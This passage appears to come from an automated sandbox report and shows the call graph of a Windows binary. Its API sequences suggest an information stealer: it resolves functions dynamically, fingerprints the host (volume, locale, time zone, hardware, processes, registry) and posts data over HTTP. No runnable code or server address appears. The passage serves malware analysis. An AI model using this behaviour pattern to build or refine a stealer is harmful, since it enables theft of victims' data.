14416->14417 14418 9545c0 2 API calls 14417->14418 14419 954289 14418->14419 14420 9545c0 2 API calls 14419->14420 14421 9542a2 14420->14421 14422 9545c0 2 API calls 14421->14422 14423 9542bb 14422->14423 14424 9545c0 2 API calls 14423->14424 14425 9542d4 14424->14425 14426 9545c0 2 API calls 14425->14426 14427 9542ed 14426->14427 14428 9545c0 2 API calls 14427->14428 14429 954306 14428->14429 14430 9545c0 2 API calls 14429->14430 14431 95431f 14430->14431 14432 9545c0 2 API calls 14431->14432 14433 954338 14432->14433 14434 9545c0 2 API calls 14433->14434 14435 954351 14434->14435 14436 9545c0 2 API calls 14435->14436 14437 95436a 14436->14437 14438 9545c0 2 API calls 14437->14438 14439 954383 14438->14439 14440 9545c0 2 API calls 14439->14440 14441 95439c 14440->14441 14442 9545c0 2 API calls 14441->14442 14443 9543b5 14442->14443 14444 9545c0 2 API calls 14443->14444 14445 9543ce 14444->14445 14446 9545c0 2 API calls 14445->14446 14447 9543e7 14446->14447 14448 9545c0 2 API calls 14447->14448 14449 954400 14448->14449 14450 9545c0 2 API calls 14449->14450 14451 954419 14450->14451 14452 9545c0 2 API calls 14451->14452 14453 954432 14452->14453 14454 9545c0 2 API calls 14453->14454 14455 95444b 14454->14455 14456 9545c0 2 API calls 14455->14456 14457 954464 14456->14457 14458 9545c0 2 API calls 14457->14458 14459 95447d 14458->14459 14460 9545c0 2 API calls 14459->14460 14461 954496 14460->14461 14462 9545c0 2 API calls 14461->14462 14463 9544af 14462->14463 14464 9545c0 2 API calls 14463->14464 14465 9544c8 14464->14465 14466 9545c0 2 API calls 14465->14466 14467 9544e1 14466->14467 14468 9545c0 2 API calls 14467->14468 14469 9544fa 14468->14469 14470 9545c0 2 API calls 14469->14470 14471 954513 14470->14471 14472 9545c0 2 API calls 14471->14472 14473 95452c 14472->14473 14474 9545c0 2 API calls 14473->14474 14475 954545 14474->14475 14476 9545c0 2 API calls 14475->14476 14477 95455e 14476->14477 14478 9545c0 2 API calls 14477->14478 14479 954577 14478->14479 14480 9545c0 2 API calls 14479->14480 14481 954590 14480->14481 14482 9545c0 2 API calls 14481->14482 14483 9545a9 14482->14483 14484 969c10 14483->14484 14485 96a036 8 API calls 14484->14485 14486 969c20 43 API calls 14484->14486 14487 96a146 14485->14487 14488 96a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14485->14488 14486->14485 14489 96a216 14487->14489 14490 96a153 8 API calls 14487->14490 14488->14487 14491 96a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14489->14491 14492 96a298 14489->14492 14490->14489 14491->14492 14493 96a337 14492->14493 14494 96a2a5 6 API calls 14492->14494 14495 96a344 9 API calls 14493->14495 14496 96a41f 14493->14496 14494->14493 14495->14496 14497 96a4a2 14496->14497 14498 96a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14496->14498 14499 96a4dc 14497->14499 14500 96a4ab GetProcAddress GetProcAddress 14497->14500 14498->14497 14501 96a515 14499->14501 14502 96a4e5 GetProcAddress GetProcAddress 14499->14502 14500->14499 14503 96a612 14501->14503 14504 96a522 10 API calls 14501->14504 14502->14501 14505 96a67d 14503->14505 14506 96a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14503->14506 14504->14503 14507 96a686 GetProcAddress 14505->14507 14508 96a69e 14505->14508 14506->14505 14507->14508 14509 96a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14508->14509 14510 965ca3 14508->14510 14509->14510 14511 951590 14510->14511 15633 951670 14511->15633 14514 96a7a0 lstrcpy 14515 9515b5 14514->14515 14516 96a7a0 lstrcpy 14515->14516 14517 9515c7 14516->14517 14518 96a7a0 lstrcpy 14517->14518 14519 9515d9 14518->14519 14520 96a7a0 lstrcpy 14519->14520 14521 951663 14520->14521 14522 965510 14521->14522 14523 965521 14522->14523 14524 96a820 2 API calls 14523->14524 14525 96552e 14524->14525 14526 96a820 2 API calls 14525->14526 14527 96553b 14526->14527 14528 96a820 2 API calls 14527->14528 14529 965548 14528->14529 14530 96a740 lstrcpy 14529->14530 14531 965555 14530->14531 14532 96a740 lstrcpy 14531->14532 14533 965562 14532->14533 14534 96a740 lstrcpy 14533->14534 14535 96556f 14534->14535 14536 96a740 lstrcpy 14535->14536 14566 96557c 14536->14566 14537 965643 StrCmpCA 14537->14566 14538 9656a0 StrCmpCA 14539 9657dc 14538->14539 14538->14566 14540 96a8a0 lstrcpy 14539->14540 14541 9657e8 14540->14541 14542 96a820 2 API calls 14541->14542 14544 9657f6 14542->14544 14543 96a820 lstrlen lstrcpy 14543->14566 14546 96a820 2 API calls 14544->14546 14545 965856 StrCmpCA 14547 965991 14545->14547 14545->14566 14549 965805 14546->14549 14548 96a8a0 lstrcpy 14547->14548 14550 96599d 14548->14550 14551 951670 lstrcpy 14549->14551 14552 96a820 2 API calls 14550->14552 14561 965811 14551->14561 14553 9659ab 14552->14553 14555 96a820 2 API calls 14553->14555 14554 965a0b StrCmpCA 14556 965a16 Sleep 14554->14556 14557 965a28 14554->14557 14559 9659ba 14555->14559 14556->14566 14560 96a8a0 lstrcpy 14557->14560 14558 96a740 lstrcpy 14558->14566 14562 951670 lstrcpy 14559->14562 14563 965a34 14560->14563 14561->13629 14562->14561 14565 96a820 2 API calls 14563->14565 14564 951590 lstrcpy 14564->14566 14567 965a43 14565->14567 14566->14537 14566->14538 14566->14543 14566->14545 14566->14554 14566->14558 14566->14564 14568 9652c0 25 API calls 14566->14568 14569 9651f0 20 API calls 14566->14569 14571 96578a StrCmpCA 14566->14571 14574 96593f StrCmpCA 14566->14574 14575 96a7a0 lstrcpy 14566->14575 14576 96a8a0 lstrcpy 14566->14576 14570 96a820 2 API calls 14567->14570 14568->14566 14569->14566 14572 965a52 14570->14572 14571->14566 14573 951670 lstrcpy 14572->14573 14573->14561 14574->14566 14575->14566 14576->14566 14578 967553 GetVolumeInformationA 14577->14578 14579 96754c 14577->14579 14585 967591 14578->14585 14579->14578 14580 9675fc GetProcessHeap RtlAllocateHeap 14581 967628 wsprintfA 14580->14581 14582 967619 14580->14582 14584 96a740 lstrcpy 14581->14584 14583 96a740 lstrcpy 14582->14583 14586 965da7 14583->14586 14584->14586 14585->14580 14586->13650 14588 96a7a0 lstrcpy 14587->14588 14589 954899 14588->14589 15642 9547b0 14589->15642 14591 9548a5 14592 96a740 lstrcpy 14591->14592 14593 9548d7 14592->14593 14594 96a740 lstrcpy 14593->14594 14595 9548e4 14594->14595 14596 96a740 lstrcpy 14595->14596 14597 9548f1 14596->14597 14598 96a740 lstrcpy 14597->14598 14599 9548fe 14598->14599 14600 96a740 lstrcpy 14599->14600 14601 95490b InternetOpenA StrCmpCA 14600->14601 14602 954944 14601->14602 14603 954955 14602->14603 14604 954ecb InternetCloseHandle 14602->14604 15653 968b60 14603->15653 14606 954ee8 14604->14606 15648 959ac0 CryptStringToBinaryA 14606->15648 14607 954963 15661 96a920 14607->15661 14610 954976 14612 96a8a0 lstrcpy 14610->14612 14617 95497f 14612->14617 14613 96a820 2 API calls 14614 954f05 14613->14614 14616 96a9b0 4 API calls 14614->14616 14615 954f27 ctype 14619 96a7a0 lstrcpy 14615->14619 14618 954f1b 14616->14618 14621 96a9b0 4 API calls 14617->14621 14620 96a8a0 lstrcpy 14618->14620 14632 954f57 14619->14632 14620->14615 14622 9549a9 14621->14622 14623 96a8a0 lstrcpy 14622->14623 14624 9549b2 14623->14624 14625 96a9b0 4 API calls 14624->14625 14626 9549d1 14625->14626 14627 96a8a0 lstrcpy 14626->14627 14628 9549da 14627->14628 14629 96a920 3 API calls 14628->14629 14630 9549f8 14629->14630 14631 96a8a0 lstrcpy 14630->14631 14633 954a01 14631->14633 14632->13653 14634 96a9b0 4 API calls 14633->14634 14635 954a20 14634->14635 14636 96a8a0 lstrcpy 14635->14636 14637 954a29 14636->14637 14638 96a9b0 4 API calls 14637->14638 14639 954a48 14638->14639 14640 96a8a0 lstrcpy 14639->14640 14641 954a51 14640->14641 14642 96a9b0 4 API calls 14641->14642 14643 954a7d 14642->14643 14644 96a920 3 API calls 14643->14644 14645 954a84 14644->14645 14646 96a8a0 lstrcpy 14645->14646 14647 954a8d 14646->14647 14648 954aa3 InternetConnectA 14647->14648 14648->14604 14649 954ad3 HttpOpenRequestA 14648->14649 14651 954ebe InternetCloseHandle 14649->14651 14652 954b28 14649->14652 14651->14604 14653 96a9b0 4 API calls 14652->14653 14654 954b3c 14653->14654 14655 96a8a0 lstrcpy 14654->14655 14656 954b45 14655->14656 14657 96a920 3 API calls 14656->14657 14658 954b63 14657->14658 14659 96a8a0 lstrcpy 14658->14659 14660 954b6c 14659->14660 14661 96a9b0 4 API calls 14660->14661 14662 954b8b 14661->14662 14663 96a8a0 lstrcpy 14662->14663 14664 954b94 14663->14664 14665 96a9b0 4 API calls 14664->14665 14666 954bb5 14665->14666 14667 96a8a0 lstrcpy 14666->14667 14668 954bbe 14667->14668 14669 96a9b0 4 API calls 14668->14669 14670 954bde 14669->14670 14671 96a8a0 lstrcpy 14670->14671 14672 954be7 14671->14672 14673 96a9b0 4 API calls 14672->14673 14674 954c06 14673->14674 14675 96a8a0 lstrcpy 14674->14675 14676 954c0f 14675->14676 14677 96a920 3 API calls 14676->14677 14678 954c2d 14677->14678 14679 96a8a0 lstrcpy 14678->14679 14680 954c36 14679->14680 14681 96a9b0 4 API calls 14680->14681 14682 954c55 14681->14682 14683 96a8a0 lstrcpy 14682->14683 14684 954c5e 14683->14684 14685 96a9b0 4 API calls 14684->14685 14686 954c7d 14685->14686 14687 96a8a0 lstrcpy 14686->14687 14688 954c86 14687->14688 14689 96a920 3 API calls 14688->14689 14690 954ca4 14689->14690 14691 96a8a0 lstrcpy 14690->14691 14692 954cad 14691->14692 14693 96a9b0 4 API calls 14692->14693 14694 954ccc 14693->14694 14695 96a8a0 lstrcpy 14694->14695 14696 954cd5 14695->14696 14697 96a9b0 4 API calls 14696->14697 14698 954cf6 14697->14698 14699 96a8a0 lstrcpy 14698->14699 14700 954cff 14699->14700 14701 96a9b0 4 API calls 14700->14701 14702 954d1f 14701->14702 14703 96a8a0 lstrcpy 14702->14703 14704 954d28 14703->14704 14705 96a9b0 4 API calls 14704->14705 14706 954d47 14705->14706 14707 96a8a0 lstrcpy 14706->14707 14708 954d50 14707->14708 14709 96a920 3 API calls 14708->14709 14710 954d6e 14709->14710 14711 96a8a0 lstrcpy 14710->14711 14712 954d77 14711->14712 14713 96a740 lstrcpy 14712->14713 14714 954d92 14713->14714 14715 96a920 3 API calls 14714->14715 14716 954db3 14715->14716 14717 96a920 3 API calls 14716->14717 14718 954dba 14717->14718 14719 96a8a0 lstrcpy 14718->14719 14720 954dc6 14719->14720 14721 954de7 lstrlen 14720->14721 14722 954dfa 14721->14722 14723 954e03 lstrlen 14722->14723 15667 96aad0 14723->15667 14725 954e13 HttpSendRequestA 14726 954e32 InternetReadFile 14725->14726 14727 954e67 InternetCloseHandle 14726->14727 14732 954e5e 14726->14732 14729 96a800 14727->14729 14729->14651 14730 96a9b0 4 API calls 14730->14732 14731 96a8a0 lstrcpy 14731->14732 14732->14726 14732->14727 14732->14730 14732->14731 15669 96aad0 14733->15669 14735 9617c4 StrCmpCA 14736 9617cf ExitProcess 14735->14736 14737 9617d7 14735->14737 14738 9619c2 14737->14738 14739 961932 StrCmpCA 14737->14739 14740 961913 StrCmpCA 14737->14740 14741 961970 StrCmpCA 14737->14741 14742 9618f1 StrCmpCA 14737->14742 14743 961951 StrCmpCA 14737->14743 14744 96187f StrCmpCA 14737->14744 14745 96185d StrCmpCA 14737->14745 14746 9618cf StrCmpCA 14737->14746 14747 9618ad StrCmpCA 14737->14747 14748 96a820 lstrlen lstrcpy 14737->14748 14738->13655 14739->14737 14740->14737 14741->14737 14742->14737 14743->14737 14744->14737 14745->14737 14746->14737 14747->14737 14748->14737 14750 96a7a0 lstrcpy 14749->14750 14751 955979 14750->14751 14752 9547b0 2 API calls 14751->14752 14753 955985 14752->14753 14754 96a740 lstrcpy 14753->14754 14755 9559ba 14754->14755 14756 96a740 lstrcpy 14755->14756 14757 9559c7 14756->14757 14758 96a740 lstrcpy 14757->14758 14759 9559d4 14758->14759 14760 96a740 lstrcpy 14759->14760 14761 9559e1 14760->14761 14762 96a740 lstrcpy 14761->14762 14763 9559ee InternetOpenA StrCmpCA 14762->14763 14764 955a1d 14763->14764 14765 955fc3 InternetCloseHandle 14764->14765 14766 968b60 3 API calls 14764->14766 14767 955fe0 14765->14767 14768 955a3c 14766->14768 14769 959ac0 4 API calls 14767->14769 14770 96a920 3 API calls 14768->14770 14771 955fe6 14769->14771 14772 955a4f 14770->14772 14774 96a820 2 API calls 14771->14774 14777 95601f ctype 14771->14777 14773 96a8a0 lstrcpy 14772->14773 14778 955a58 14773->14778 14775 955ffd 14774->14775 14776 96a9b0 4 API calls 14775->14776 14779 956013 14776->14779 14781 96a7a0 lstrcpy 14777->14781 14782 96a9b0 4 API calls 14778->14782 14780 96a8a0 lstrcpy 14779->14780 14780->14777 14791 95604f 14781->14791 14783 955a82 14782->14783 14784 96a8a0 lstrcpy 14783->14784 14785 955a8b 14784->14785 14786 96a9b0 4 API calls 14785->14786 14787 955aaa 14786->14787 14788 96a8a0 lstrcpy 14787->14788 14789 955ab3 14788->14789 14790 96a920 3 API calls 14789->14790 14792 955ad1 14790->14792 14791->13661 14793 96a8a0 lstrcpy 14792->14793 14794 955ada 14793->14794 14795 96a9b0 4 API calls 14794->14795 14796 955af9 14795->14796 14797 96a8a0 lstrcpy 14796->14797 14798 955b02 14797->14798 14799 96a9b0 4 API calls 14798->14799 14800 955b21 14799->14800 14801 96a8a0 lstrcpy 14800->14801 14802 955b2a 14801->14802 14803 96a9b0 4 API calls 14802->14803 14804 955b56 14803->14804 14805 96a920 3 API calls 14804->14805 14806 955b5d 14805->14806 14807 96a8a0 lstrcpy 14806->14807 14808 955b66 14807->14808 14809 955b7c InternetConnectA 14808->14809 14809->14765 14810 955bac HttpOpenRequestA 14809->14810 14812 955fb6 InternetCloseHandle 14810->14812 14813 955c0b 14810->14813 14812->14765 14814 96a9b0 4 API calls 14813->14814 14815 955c1f 14814->14815 14816 96a8a0 lstrcpy 14815->14816 14817 955c28 14816->14817 14818 96a920 3 API calls 14817->14818 14819 955c46 14818->14819 14820 96a8a0 lstrcpy 14819->14820 14821 955c4f 14820->14821 14822 96a9b0 4 API calls 14821->14822 14823 955c6e 14822->14823 14824 96a8a0 lstrcpy 14823->14824 14825 955c77 14824->14825 14826 96a9b0 4 API calls 14825->14826 14827 955c98 14826->14827 14828 96a8a0 lstrcpy 14827->14828 14829 955ca1 14828->14829 14830 96a9b0 4 API calls 14829->14830 14831 955cc1 14830->14831 14832 96a8a0 lstrcpy 14831->14832 14833 955cca 14832->14833 14834 96a9b0 4 API calls 14833->14834 14835 955ce9 14834->14835 14836 96a8a0 lstrcpy 14835->14836 14837 955cf2 14836->14837 14838 96a920 3 API calls 14837->14838 14839 955d10 14838->14839 14840 96a8a0 lstrcpy 14839->14840 14841 955d19 14840->14841 14842 96a9b0 4 API calls 14841->14842 14843 955d38 14842->14843 14844 96a8a0 lstrcpy 14843->14844 14845 955d41 14844->14845 14846 96a9b0 4 API calls 14845->14846 14847 955d60 14846->14847 14848 96a8a0 lstrcpy 14847->14848 14849 955d69 14848->14849 14850 96a920 3 API calls 14849->14850 14851 955d87 14850->14851 14852 96a8a0 lstrcpy 14851->14852 14853 955d90 14852->14853 14854 96a9b0 4 API calls 14853->14854 14855 955daf 14854->14855 14856 96a8a0 lstrcpy 14855->14856 14857 955db8 14856->14857 14858 96a9b0 4 API calls 14857->14858 14859 955dd9 14858->14859 14860 96a8a0 lstrcpy 14859->14860 14861 955de2 14860->14861 14862 96a9b0 4 API calls 14861->14862 14863 955e02 14862->14863 14864 96a8a0 lstrcpy 14863->14864 14865 955e0b 14864->14865 14866 96a9b0 4 API calls 14865->14866 14867 955e2a 14866->14867 14868 96a8a0 lstrcpy 14867->14868 14869 955e33 14868->14869 14870 96a920 3 API calls 14869->14870 14871 955e54 14870->14871 14872 96a8a0 lstrcpy 14871->14872 14873 955e5d 14872->14873 14874 955e70 lstrlen 14873->14874 15670 96aad0 14874->15670 14876 955e81 lstrlen GetProcessHeap RtlAllocateHeap 15671 96aad0 14876->15671 14878 955eae lstrlen 14879 955ebe 14878->14879 14880 955ed7 lstrlen 14879->14880 14881 955ee7 14880->14881 14882 955ef0 lstrlen 14881->14882 14883 955f04 14882->14883 14884 955f1a lstrlen 14883->14884 15672 96aad0 14884->15672 14886 955f2a HttpSendRequestA 14887 955f35 InternetReadFile 14886->14887 14888 955f6a InternetCloseHandle 14887->14888 14892 955f61 14887->14892 14888->14812 14890 96a9b0 4 API calls 14890->14892 14891 96a8a0 lstrcpy 14891->14892 14892->14887 14892->14888 14892->14890 14892->14891 14894 961077 14893->14894 14895 961151 14894->14895 14896 96a820 lstrlen lstrcpy 14894->14896 14895->13663 14896->14894 14898 960db7 14897->14898 14899 960f17 14898->14899 14900 960e27 StrCmpCA 14898->14900 14901 960e67 StrCmpCA 14898->14901 14902 960ea4 StrCmpCA 14898->14902 14903 96a820 lstrlen lstrcpy 14898->14903 14899->13671 14900->14898 14901->14898 14902->14898 14903->14898 14906 960f67 14904->14906 14905 961044 14905->13679 14906->14905 14907 960fb2 StrCmpCA 14906->14907 14908 96a820 lstrlen lstrcpy 14906->14908 14907->14906 14908->14906 14910 96a740 lstrcpy 14909->14910 14911 961a26 14910->14911 14912 96a9b0 4 API calls 14911->14912 14913 961a37 14912->14913 14914 96a8a0 lstrcpy 14913->14914 14915 961a40 14914->14915 14916 96a9b0 4 API calls 14915->14916 14917 961a5b 14916->14917 14918 96a8a0 lstrcpy 14917->14918 14919 961a64 14918->14919 14920 96a9b0 4 API calls 14919->14920 14921 961a7d 14920->14921 14922 96a8a0 lstrcpy 14921->14922 14923 961a86 14922->14923 14924 96a9b0 4 API calls 14923->14924 14925 961aa1 14924->14925 14926 96a8a0 lstrcpy 14925->14926 14927 961aaa 14926->14927 14928 96a9b0 4 API calls 14927->14928 14929 961ac3 14928->14929 14930 96a8a0 lstrcpy 14929->14930 14931 961acc 14930->14931 14932 96a9b0 4 API calls 14931->14932 14933 961ae7 14932->14933 14934 96a8a0 lstrcpy 14933->14934 14935 961af0 14934->14935 14936 96a9b0 4 API calls 14935->14936 14937 961b09 14936->14937 14938 96a8a0 lstrcpy 14937->14938 14939 961b12 14938->14939 14940 96a9b0 4 API calls 14939->14940 14941 961b2d 14940->14941 14942 96a8a0 lstrcpy 14941->14942 14943 961b36 14942->14943 14944 96a9b0 4 API calls 14943->14944 14945 961b4f 14944->14945 14946 96a8a0 lstrcpy 14945->14946 14947 961b58 14946->14947 14948 96a9b0 4 API calls 14947->14948 14949 961b76 14948->14949 14950 96a8a0 lstrcpy 14949->14950 14951 961b7f 14950->14951 14952 967500 6 API calls 14951->14952 14953 961b96 14952->14953 14954 96a920 3 API calls 14953->14954 14955 961ba9 14954->14955 14956 96a8a0 lstrcpy 14955->14956 14957 961bb2 14956->14957 14958 96a9b0 4 API calls 14957->14958 14959 961bdc 14958->14959 14960 96a8a0 lstrcpy 14959->14960 14961 961be5 14960->14961 14962 96a9b0 4 API calls 14961->14962 14963 961c05 14962->14963 14964 96a8a0 lstrcpy 14963->14964 14965 961c0e 14964->14965 15673 967690 GetProcessHeap RtlAllocateHeap 14965->15673 14968 96a9b0 4 API calls 14969 961c2e 14968->14969 14970 96a8a0 lstrcpy 14969->14970 14971 961c37 14970->14971 14972 96a9b0 4 API calls 14971->14972 14973 961c56 14972->14973 14974 96a8a0 lstrcpy 14973->14974 14975 961c5f 14974->14975 14976 96a9b0 4 API calls 14975->14976 14977 961c80 14976->14977 14978 96a8a0 lstrcpy 14977->14978 14979 961c89 14978->14979 15680 9677c0 GetCurrentProcess IsWow64Process 14979->15680 14982 96a9b0 4 API calls 14983 961ca9 14982->14983 14984 96a8a0 lstrcpy 14983->14984 14985 961cb2 14984->14985 14986 96a9b0 4 API calls 14985->14986 14987 961cd1 14986->14987 14988 96a8a0 lstrcpy 14987->14988 14989 961cda 14988->14989 14990 96a9b0 4 API calls 14989->14990 14991 961cfb 14990->14991 14992 96a8a0 lstrcpy 14991->14992 14993 961d04 14992->14993 14994 967850 3 API calls 14993->14994 14995 961d14 14994->14995 14996 96a9b0 4 API calls 14995->14996 14997 961d24 14996->14997 14998 96a8a0 lstrcpy 14997->14998 14999 961d2d 14998->14999 15000 96a9b0 4 API calls 14999->15000 15001 961d4c 15000->15001 15002 96a8a0 lstrcpy 15001->15002 15003 961d55 15002->15003 15004 96a9b0 4 API calls 15003->15004 15005 961d75 15004->15005 15006 96a8a0 lstrcpy 15005->15006 15007 961d7e 15006->15007 15008 9678e0 3 API calls 15007->15008 15009 961d8e 15008->15009 15010 96a9b0 4 API calls 15009->15010 15011 961d9e 15010->15011 15012 96a8a0 lstrcpy 15011->15012 15013 961da7 15012->15013 15014 96a9b0 4 API calls 15013->15014 15015 961dc6 15014->15015 15016 96a8a0 lstrcpy 15015->15016 15017 961dcf 15016->15017 15018 96a9b0 4 API calls 15017->15018 15019 961df0 15018->15019 15020 96a8a0 lstrcpy 15019->15020 15021 961df9 15020->15021 15682 967980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15021->15682 15024 96a9b0 4 API calls 15025 961e19 15024->15025 15026 96a8a0 lstrcpy 15025->15026 15027 961e22 15026->15027 15028 96a9b0 4 API calls 15027->15028 15029 961e41 15028->15029 15030 96a8a0 lstrcpy 15029->15030 15031 961e4a 15030->15031 15032 96a9b0 4 API calls 15031->15032 15033 961e6b 15032->15033 15034 96a8a0 lstrcpy 15033->15034 15035 961e74 15034->15035 15684 967a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15035->15684 15038 96a9b0 4 API calls 15039 961e94 15038->15039 15040 96a8a0 lstrcpy 15039->15040 15041 961e9d 15040->15041 15042 96a9b0 4 API calls 15041->15042 15043 961ebc 15042->15043 15044 96a8a0 lstrcpy 15043->15044 15045 961ec5 15044->15045 15046 96a9b0 4 API calls 15045->15046 15047 961ee5 15046->15047 15048 96a8a0 lstrcpy 15047->15048 15049 961eee 15048->15049 15687 967b00 GetUserDefaultLocaleName 15049->15687 15052 96a9b0 4 API calls 15053 961f0e 15052->15053 15054 96a8a0 lstrcpy 15053->15054 15055 961f17 15054->15055 15056 96a9b0 4 API calls 15055->15056 15057 961f36 15056->15057 15058 96a8a0 lstrcpy 15057->15058 15059 961f3f 15058->15059 15060 96a9b0 4 API calls 15059->15060 15061 961f60 15060->15061 15062 96a8a0 lstrcpy 15061->15062 15063 961f69 15062->15063 15691 967b90 15063->15691 15065 961f80 15066 96a920 3 API calls 15065->15066 15067 961f93 15066->15067 15068 96a8a0 lstrcpy 15067->15068 15069 961f9c 15068->15069 15070 96a9b0 4 API calls 15069->15070 15071 961fc6 15070->15071 15072 96a8a0 lstrcpy 15071->15072 15073 961fcf 15072->15073 15074 96a9b0 4 API calls 15073->15074 15075 961fef 15074->15075 15076 96a8a0 lstrcpy 15075->15076 15077 961ff8 15076->15077 15703 967d80 GetSystemPowerStatus 15077->15703 15080 96a9b0 4 API calls 15081 962018 15080->15081 15082 96a8a0 lstrcpy 15081->15082 15083 962021 15082->15083 15084 96a9b0 4 API calls 15083->15084 15085 962040 15084->15085 15086 96a8a0 lstrcpy 15085->15086 15087 962049 15086->15087 15088 96a9b0 4 API calls 15087->15088 15089 96206a 15088->15089 15090 96a8a0 lstrcpy 15089->15090 15091 962073 15090->15091 15092 96207e GetCurrentProcessId 15091->15092 15705 969470 OpenProcess 15092->15705 15095 96a920 3 API calls 15096 9620a4 15095->15096 15097 96a8a0 lstrcpy 15096->15097 15098 9620ad 15097->15098 15099 96a9b0 4 API calls 15098->15099 15100 9620d7 15099->15100 15101 96a8a0 lstrcpy 15100->15101 15102 9620e0 15101->15102 15103 96a9b0 4 API calls 15102->15103 15104 962100 15103->15104 15105 96a8a0 lstrcpy 15104->15105 15106 962109 15105->15106 15710 967e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15106->15710 15109 96a9b0 4 API calls 15110 962129 15109->15110 15111 96a8a0 lstrcpy 15110->15111 15112 962132 15111->15112 15113 96a9b0 4 API calls 15112->15113 15114 962151 15113->15114 15115 96a8a0 lstrcpy 15114->15115 15116 96215a 15115->15116 15117 96a9b0 4 API calls 15116->15117 15118 96217b 15117->15118 15119 96a8a0 lstrcpy 15118->15119 15120 962184 15119->15120 15714 967f60 15120->15714 15123 96a9b0 4 API calls 15124 9621a4 15123->15124 15125 96a8a0 lstrcpy 15124->15125 15126 9621ad 15125->15126 15127 96a9b0 4 API calls 15126->15127 15128 9621cc 15127->15128 15129 96a8a0 lstrcpy 15128->15129 15130 9621d5 15129->15130 15131 96a9b0 4 API calls 15130->15131 15132 9621f6 15131->15132 15133 96a8a0 lstrcpy 15132->15133 15134 9621ff 15133->15134 15727 967ed0 GetSystemInfo wsprintfA 15134->15727 15137 96a9b0 4 API calls 15138 96221f 15137->15138 15139 96a8a0 lstrcpy 15138->15139 15140 962228 15139->15140 15141 96a9b0 4 API calls 15140->15141 15142 962247 15141->15142 15143 96a8a0 lstrcpy 15142->15143 15144 962250 15143->15144 15145 96a9b0 4 API calls 15144->15145 15146 962270 15145->15146 15147 96a8a0 lstrcpy 15146->15147 15148 962279 15147->15148 15729 968100 GetProcessHeap RtlAllocateHeap 15148->15729 15151 96a9b0 4 API calls 15152 962299 15151->15152 15153 96a8a0 lstrcpy 15152->15153 15154 9622a2 15153->15154 15155 96a9b0 4 API calls 15154->15155 15156 9622c1 15155->15156 15157 96a8a0 lstrcpy 15156->15157 15158 9622ca 15157->15158 15159 96a9b0 4 API calls 15158->15159 15160 9622eb 15159->15160 15161 96a8a0 lstrcpy 15160->15161 15162 9622f4 15161->15162 15735 9687c0 15162->15735 15165 96a920 3 API calls 15166 96231e 15165->15166 15167 96a8a0 lstrcpy 15166->15167 15168 962327 15167->15168 15169 96a9b0 4 API calls 15168->15169 15170 962351 15169->15170 15171 96a8a0 lstrcpy 15170->15171 15172 96235a 15171->15172 15173 96a9b0 4 API calls 15172->15173 15174 96237a 15173->15174 15175 96a8a0 lstrcpy 15174->15175 15176 962383 15175->15176 15177 96a9b0 4 API calls 15176->15177 15178 9623a2 15177->15178 15179 96a8a0 lstrcpy 15178->15179 15180 9623ab 15179->15180 15740 9681f0 15180->15740 15182 9623c2 15183 96a920 3 API calls 15182->15183 15184 9623d5 15183->15184 15185 96a8a0 lstrcpy 15184->15185 15186 9623de 15185->15186 15187 96a9b0 4 API calls 15186->15187 15188 96240a 15187->15188 15189 96a8a0 lstrcpy 15188->15189 15190 962413 15189->15190 15191 96a9b0 4 API calls 15190->15191 15192 962432 15191->15192 15193 96a8a0 lstrcpy 15192->15193 15194 96243b 15193->15194 15195 96a9b0 4 API calls 15194->15195 15196 96245c 15195->15196 15197 96a8a0 lstrcpy 15196->15197 15198 962465 15197->15198 15199 96a9b0 4 API calls 15198->15199 15200 962484 15199->15200 15201 96a8a0 lstrcpy 15200->15201 15202 96248d 15201->15202 15203 96a9b0 4 API calls 15202->15203 15204 9624ae 15203->15204 15205 96a8a0 lstrcpy 15204->15205 15206 9624b7 15205->15206 15748 968320 15206->15748 15208 9624d3 15209 96a920 3 API calls 15208->15209 15210 9624e6 15209->15210 15211 96a8a0 lstrcpy 15210->15211 15212 9624ef 15211->15212 15213 96a9b0 4 API calls 15212->15213 15214 962519 15213->15214 15215 96a8a0 lstrcpy 15214->15215 15216 962522 15215->15216 15217 96a9b0 4 API calls 15216->15217 15218 962543 15217->15218 15219 96a8a0 lstrcpy 15218->15219 15220 96254c 15219->15220 15221 968320 17 API calls 15220->15221 15222 962568 15221->15222 15223 96a920 3 API calls 15222->15223 15224 96257b 15223->15224 15225 96a8a0 lstrcpy 15224->15225 15226 962584 15225->15226 15227 96a9b0 4 API calls 15226->15227 15228 9625ae 15227->15228 15229 96a8a0 lstrcpy 15228->15229 15230 9625b7 15229->15230 15231 96a9b0 4 API calls 15230->15231 15232 9625d6 15231->15232 15233 96a8a0 lstrcpy 15232->15233 15234 9625df 15233->15234 15235 96a9b0 4 API calls 15234->15235 15236 962600 15235->15236 15237 96a8a0 lstrcpy 15236->15237 15238 962609 15237->15238 15784 968680 15238->15784 15240 962620 15241 96a920 3 API calls 15240->15241 15242 962633 15241->15242 15243 96a8a0 lstrcpy 15242->15243 15244 96263c 15243->15244 15245 96265a lstrlen 15244->15245 15246 96266a 15245->15246 15247 96a740 lstrcpy 15246->15247 15248 96267c 15247->15248 15249 951590 lstrcpy 15248->15249 15250 96268d 15249->15250 15794 965190 15250->15794 15252 962699 15252->13683 15982 96aad0 15253->15982 15255 955009 InternetOpenUrlA 15259 955021 15255->15259 15256 9550a0 InternetCloseHandle InternetCloseHandle 15258 9550ec 15256->15258 15257 95502a InternetReadFile 15257->15259 15258->13687 15259->15256 15259->15257 15983 9598d0 15260->15983 15262 960759 15263 96077d 15262->15263 15264 960a38 15262->15264 15267 960799 StrCmpCA 15263->15267 15265 951590 lstrcpy 15264->15265 15266 960a49 15265->15266 16159 960250 15266->16159 15269 9607a8 15267->15269 15270 960843 15267->15270 15272 96a7a0 lstrcpy 15269->15272 15273 960865 StrCmpCA 15270->15273 15274 9607c3 15272->15274 15275 960874 15273->15275 15312 96096b 15273->15312 15276 951590 lstrcpy 15274->15276 15277 96a740 lstrcpy 15275->15277 15278 96080c 15276->15278 15281 960881 15277->15281 15279 96a7a0 lstrcpy 15278->15279 15282 960823 15279->15282 15280 96099c StrCmpCA 15283 960a2d 15280->15283 15284 